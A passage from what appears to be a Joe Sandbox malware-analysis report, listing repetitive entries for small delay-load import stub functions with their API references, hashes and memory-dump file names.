              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 00b8dd1157c72328332d4294af7b663e4697ffa03a1342d268ebdecc55119eef
              • Instruction ID: e01f93ebc1e751b3dea55b39f5a7a57791a7e67ea95050ad34f57bb88d0f57d5
              • Opcode Fuzzy Hash: 00b8dd1157c72328332d4294af7b663e4697ffa03a1342d268ebdecc55119eef
              • Instruction Fuzzy Hash: 83B0129326C0016D35086217AC83F3602CCC4C1B1033080FAB509E00C2D6C05C041432
              Function 00B9D924 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
              Download Yara Rule
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B9D8A3
                • Part of subcall function 00B9DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9DFD6
                • Part of subcall function 00B9DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9DFE7
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 0b67f09e69c8ffc218ded1527550d4ccefb80a2ed973efd65c93819b6d5e48d4
              • Instruction ID: b3117ec55b0adc3b6009ee6b0b50881ffa4df9a774c86301e1078bcb3045be2e
              • Opcode Fuzzy Hash: 0b67f09e69c8ffc218ded1527550d4ccefb80a2ed973efd65c93819b6d5e48d4
              • Instruction Fuzzy Hash: ABB0129227D0016D35086207AC83F3602CDC8C0B1133040FEB009E00C2D5C05C040432
              Function 00B9D910 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
              Download Yara Rule
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B9D8A3
                • Part of subcall function 00B9DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9DFD6
                • Part of subcall function 00B9DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9DFE7
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: a83fc59fb30bb00ae3857e4c969f329c305a41e9e2556dc1e918e4b8cf170659
              • Instruction ID: d95490674e4e38e6eaab804b92f1c4039401f7a0e08a11b64104536f34bee743
              • Opcode Fuzzy Hash: a83fc59fb30bb00ae3857e4c969f329c305a41e9e2556dc1e918e4b8cf170659
              • Instruction Fuzzy Hash: 5FB012A226D1016D35486307AC83F3A02CDC4C0B1133141FAB009E00C2D5C05C440432
              Function 00B9D906 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
              Download Yara Rule
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B9D8A3
                • Part of subcall function 00B9DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9DFD6
                • Part of subcall function 00B9DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9DFE7
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 43aa6e380ee6860a5765ef8b6695898c98c447d547e4bdf970755c54b77b752f
              • Instruction ID: db82a170f79697e46de2a16afebc12595a215d2cde21542ba20a65013c4fd5c0
              • Opcode Fuzzy Hash: 43aa6e380ee6860a5765ef8b6695898c98c447d547e4bdf970755c54b77b752f
              • Instruction Fuzzy Hash: A7B0129226D0016D35086207AC83F3602CDC4C1B1133080FAB409E00C2D5C05C040432
              Function 00B9D942 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
              Download Yara Rule
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B9D8A3
                • Part of subcall function 00B9DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9DFD6
                • Part of subcall function 00B9DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9DFE7
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 9345f64c58e0211f7db3ef19c3903f139161a334e493717b67eb94d77053aece
              • Instruction ID: aa8b3972768ae6c1a5023522ba5ee9c023bb1a699e72e47b4d1abea2957f55b7
              • Opcode Fuzzy Hash: 9345f64c58e0211f7db3ef19c3903f139161a334e493717b67eb94d77053aece
              • Instruction Fuzzy Hash: 7EB012A326C001AD350C6207AD83F3602CCC4C0B1033040FAB009E00C2D9C05D051432
              Function 00B9DAD9 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
              Download Yara Rule
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B9DAB2
                • Part of subcall function 00B9DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9DFD6
                • Part of subcall function 00B9DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9DFE7
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 9b39169978ff52a156fee66d35c2e99aa9f5e03d71631fd27386dc665408866d
              • Instruction ID: 6ed6baa08284fb19484243f45c6bfa3166fe01620bec97ab9949d8d1c4aad50b
              • Opcode Fuzzy Hash: 9b39169978ff52a156fee66d35c2e99aa9f5e03d71631fd27386dc665408866d
              • Instruction Fuzzy Hash: 53B012922AC0016D790873076C03F3E02CDC0C4B1033085FBB109D0085D5C44C094431
              Function 00B9DACF Relevance: 1.5, APIs: 1, Instructions: 10COMMON
              Download Yara Rule
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B9DAB2
                • Part of subcall function 00B9DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9DFD6
                • Part of subcall function 00B9DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9DFE7
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 2dbbfc8f98215b756342f868fa251c2ce70cd82e5863abe7ee29576dda49a12c
              • Instruction ID: aba144b73c01ef4be1df04382a4a60343d1d8bf60e7c966d528bd0c63c4ba813
              • Opcode Fuzzy Hash: 2dbbfc8f98215b756342f868fa251c2ce70cd82e5863abe7ee29576dda49a12c
              • Instruction Fuzzy Hash: E0B012A226C001AD3D4873076C03E3A02CCC0C0B10330C1FBB409D0095D5C84C044431
              Function 00B9DBFC Relevance: 1.5, APIs: 1, Instructions: 10COMMON
              Download Yara Rule
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B9DBD5
                • Part of subcall function 00B9DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9DFD6
                • Part of subcall function 00B9DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9DFE7
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: e364df673896c943ff42bcf12aa183568a695885a27611667315514f289fe006
              • Instruction ID: b203c4860d60fc5e03a2c639483af3119c1731a67f9d3a88074702b9f68170ed
              • Opcode Fuzzy Hash: e364df673896c943ff42bcf12aa183568a695885a27611667315514f289fe006
              • Instruction Fuzzy Hash: 5CB0129636C0426D350C521B2D17E7B02DCC0C0B2033084FAB109C0091DEC08C054031
              Function 00B9DBE8 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
              Download Yara Rule
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B9DBD5
                • Part of subcall function 00B9DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9DFD6
                • Part of subcall function 00B9DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9DFE7
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: c648951c834e7b6617b672b21df021fa844be8b5c59a9f58c1f8a7d7b05c40be
              • Instruction ID: 665ecaa8684d2424f3e6ab0ff250d9d5d04e3e629fe655fac6f66129ed4c0093
              • Opcode Fuzzy Hash: c648951c834e7b6617b672b21df021fa844be8b5c59a9f58c1f8a7d7b05c40be
              • Instruction Fuzzy Hash: 31B0129636C002AD354C521B2C17E7B02ECC0C0B1033084FAB409C1091DAC08C084131
              Function 00B9DBDE Relevance: 1.5, APIs: 1, Instructions: 10COMMON
              Download Yara Rule
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B9DBD5
                • Part of subcall function 00B9DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9DFD6
                • Part of subcall function 00B9DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9DFE7
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 84bd069a6e98e4650809cd1959307a6b53147ef25da6c5d3b202af07f7537b09
              • Instruction ID: 8e5cb3fa6710fcc54daf1f967e3913c65ae7e01acd6c90765b8513c7c25a3831
              • Opcode Fuzzy Hash: 84bd069a6e98e4650809cd1959307a6b53147ef25da6c5d3b202af07f7537b09
              • Instruction Fuzzy Hash: 5FB0129636C0016D350C522B2C17F7A02DCD0C0B1033044FAB00AC0091DAC08C084031
              Function 00B9DBC3 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
              Download Yara Rule
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B9DBD5
                • Part of subcall function 00B9DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9DFD6
                • Part of subcall function 00B9DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9DFE7
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: cd7027cd63e85b3a4da5000bdb46dbe0f524b4d124af87cbf3ec82dc023b8f4c
              • Instruction ID: 5f43866e6035117fed52eda535ab58e8f912d4535f79bdc6f35836b847b4c17f
              • Opcode Fuzzy Hash: cd7027cd63e85b3a4da5000bdb46dbe0f524b4d124af87cbf3ec82dc023b8f4c
              • Instruction Fuzzy Hash: 90B0129637C10A7D360C52172C17D7B02DCC0C0B1033045FAB005D00919AC08C484031
              Function 00B9DB01 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
              Download Yara Rule
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B9DAB2
                • Part of subcall function 00B9DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9DFD6
                • Part of subcall function 00B9DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9DFE7
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: d63d274609f2e2233e515689d8e71d9ad81bdf704f00d71739c9f12fc19be62c
              • Instruction ID: 901370f4840824c365f79f0f730b89745d3211eb0a347d134e3963e87da9a5a4
              • Opcode Fuzzy Hash: d63d274609f2e2233e515689d8e71d9ad81bdf704f00d71739c9f12fc19be62c
              • Instruction Fuzzy Hash: E4B012922AC101AD790873076D43F3A02CDD0C0B1033041FBB009D0085D5C44C044531
              Function 00B9DC24 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
              Download Yara Rule
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B9DC36
                • Part of subcall function 00B9DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9DFD6
                • Part of subcall function 00B9DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9DFE7
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: c07f540b25aec0ff15dfa4d89256365ebb54ecf10da7e381a27030e9a4f18465
              • Instruction ID: b70a8c3abe5e6cae9ad4bedc26293846150989e7aaa79dc24ecb379b05b67120
              • Opcode Fuzzy Hash: c07f540b25aec0ff15dfa4d89256365ebb54ecf10da7e381a27030e9a4f18465
              • Instruction Fuzzy Hash: A6B0129666C2057D350C2607EE03D7602FCC1C0B103304BFEB306F006096C0DC445032
              Function 00B9DC5D Relevance: 1.5, APIs: 1, Instructions: 10COMMON
              Download Yara Rule
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B9DC36
                • Part of subcall function 00B9DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9DFD6
                • Part of subcall function 00B9DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9DFE7
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 6982a055e6bbfb491f4b180f7ab8f32e4a123c8a61209e2dd3d4dbc072dc692a
              • Instruction ID: 3917b7f60a5c1512a0bfbfadaac1b908c4e186e08029e6ecfb3375a06f12b0ba
              • Opcode Fuzzy Hash: 6982a055e6bbfb491f4b180f7ab8f32e4a123c8a61209e2dd3d4dbc072dc692a
              • Instruction Fuzzy Hash: 37B0129667C2016D350C660BEC03E7602FCC0C0B103304AFFB30AE0060D6C0DC044032
              Function 00B9DC53 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
              Download Yara Rule
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B9DC36
                • Part of subcall function 00B9DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9DFD6
                • Part of subcall function 00B9DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9DFE7
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: ba30fcae03e970ba170c565141ae08d9f145101f324adce1bb8a79c00dda286c
              • Instruction ID: 6b85207b7f9c0dde14ef42351f28f44dd6dc0e726fdff77ed4d9cfdb0dfc16ff
              • Opcode Fuzzy Hash: ba30fcae03e970ba170c565141ae08d9f145101f324adce1bb8a79c00dda286c
              • Instruction Fuzzy Hash: 58B0129666C1016D350C660BEC03E7602FCC0C5B103308AFEB70AE0060D6C0DC044032
              Function 00B9D8D9 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
              Download Yara Rule
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B9D8A3
                • Part of subcall function 00B9DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9DFD6
                • Part of subcall function 00B9DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9DFE7
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: d0909cb7d433984997ad8892662907d85e7eaac46ac5e4e453ee8503cc627b02
              • Instruction ID: eea3e118674c5a4fb69f20dc15124ad1cf1ec3025d648af3b5887358ef6be7ee
              • Opcode Fuzzy Hash: d0909cb7d433984997ad8892662907d85e7eaac46ac5e4e453ee8503cc627b02
              • Instruction Fuzzy Hash: 4FA001A66AD502BD79086652AD97F7A029CC8C5B6133089BAB44AA40D2A9C468495831
              Function 00B9D997 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
              Download Yara Rule
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B9D8A3
                • Part of subcall function 00B9DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9DFD6
                • Part of subcall function 00B9DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9DFE7
              Memory Dump Source
